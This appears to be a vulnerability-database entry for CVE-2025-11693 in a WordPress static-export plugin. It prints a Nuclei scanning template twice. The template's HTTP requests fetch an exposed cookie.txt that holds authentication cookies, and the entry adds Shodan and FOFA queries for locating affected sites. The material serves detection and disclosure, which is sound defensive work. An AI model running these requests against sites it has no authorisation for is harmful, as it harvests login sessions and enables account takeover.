Export WP Page to Static HTML <= 4.3.4 - Cookie Exposure

CVE-2025-11693

Verified

Description

Export WP Page to Static HTML & PDF WordPress plugin <= 4.3.4 contains a sensitive information exposure caused by publicly exposed cookies.txt files with authentication cookies, letting unauthenticated attackers access sensitive authentication data, exploit requires site administrator to trigger backup with specific user role.

Severity

Critical

CVSS Score

9.8

Exploit Probability

Published Date

April 22, 2026

Template Author

0x_akoko

CVE-2025-11693.yaml

id: CVE-2025-11693

info:
  name: Export WP Page to Static HTML <= 4.3.4 - Cookie Exposure
  author: 0x_Akoko
  severity: critical
  description: |
   Export WP Page to Static HTML & PDF WordPress plugin <= 4.3.4 contains a sensitive information exposure caused by publicly exposed cookies.txt files with authentication cookies, letting unauthenticated attackers access sensitive authentication data, exploit requires site administrator to trigger backup with specific user role.
  impact: |
   Unauthenticated attackers can access authentication cookies, potentially leading to account compromise or unauthorized access.
  remediation: |
   Update to the latest version beyond 4.3.4.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/export-wp-page-to-static-html/export-wp-page-to-static-html-pdf-434-unauthenticated-cookie-exposure-via-log-file
    - https://nvd.nist.gov/vuln/detail/CVE-2025-11693
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-11693
    epss-score: 0.05097
    epss-percentile: 0.89928
    cwe-id: CWE-200
  metadata:
    verified: true
    max-request: 2
    fofa-query: body="/wp-content/plugins/export-wp-page-to-static-html/"
    shodan-query: http.html:"/wp-content/plugins/export-wp-page-to-static-html/"
  tags: cve,cve2025,wordpress,wp,wp-plugin,export-wp-page-to-static-html,exposure

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /wp-content/plugins/export-wp-page-to-static-html/README.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - "contains(body, 'Export WP Page')"
        condition: and
        internal: true

  - raw:
      - |
        GET /wp-content/uploads/exported_html_files/cookie.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - "contains(body, 'wordpress')"
          - "contains_all(body, 'TRUE', 'FALSE', 'HttpOnly')"
        condition: and
# digest: 4a0a00473045022100b3dd91b092e2a22fc5e17961559a33f80f1cabd26713d0f301b580ab46393ec202202d85a654f5f5591ce71b78f2e3ae9c76a8b9d6fdd14d8caf35e6b82b10ed848b:922c64590222798bb761d5b6d8e72950

9.8Score

CVSS Metrics

CVSS Vector:

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE ID:

cve-2025-11693

CWE ID:

cwe-200

References

https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/export-wp-page-to-static-html/export-wp-page-to-static-html-pdf-434-unauthenticated-cookie-exposure-via-log-file https://nvd.nist.gov/vuln/detail/CVE-2025-11693

Remediation Steps

Update to the latest version beyond 4.3.4.

Description

id: CVE-2025-11693

info:
  name: Export WP Page to Static HTML <= 4.3.4 - Cookie Exposure
  author: 0x_Akoko
  severity: critical
  description: |
   Export WP Page to Static HTML & PDF WordPress plugin <= 4.3.4 contains a sensitive information exposure caused by publicly exposed cookies.txt files with authentication cookies, letting unauthenticated attackers access sensitive authentication data, exploit requires site administrator to trigger backup with specific user role.
  impact: |
   Unauthenticated attackers can access authentication cookies, potentially leading to account compromise or unauthorized access.
  remediation: |
   Update to the latest version beyond 4.3.4.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/export-wp-page-to-static-html/export-wp-page-to-static-html-pdf-434-unauthenticated-cookie-exposure-via-log-file
    - https://nvd.nist.gov/vuln/detail/CVE-2025-11693
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-11693
    epss-score: 0.05097
    epss-percentile: 0.89928
    cwe-id: CWE-200
  metadata:
    verified: true
    max-request: 2
    fofa-query: body="/wp-content/plugins/export-wp-page-to-static-html/"
    shodan-query: http.html:"/wp-content/plugins/export-wp-page-to-static-html/"
  tags: cve,cve2025,wordpress,wp,wp-plugin,export-wp-page-to-static-html,exposure

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /wp-content/plugins/export-wp-page-to-static-html/README.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - "contains(body, 'Export WP Page')"
        condition: and
        internal: true

  - raw:
      - |
        GET /wp-content/uploads/exported_html_files/cookie.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - "contains(body, 'wordpress')"
          - "contains_all(body, 'TRUE', 'FALSE', 'HttpOnly')"
        condition: and
# digest: 4a0a00473045022100b3dd91b092e2a22fc5e17961559a33f80f1cabd26713d0f301b580ab46393ec202202d85a654f5f5591ce71b78f2e3ae9c76a8b9d6fdd14d8caf35e6b82b10ed848b:922c64590222798bb761d5b6d8e72950

Export WP Page to Static HTML <= 4.3.4 - Cookie Exposure

Description

Severity

CVSS Score

Exploit Probability

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps

Export WP Page to Static HTML <= 4.3.4 - Cookie Exposure

Description

Severity

CVSS Score

Exploit Probability

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps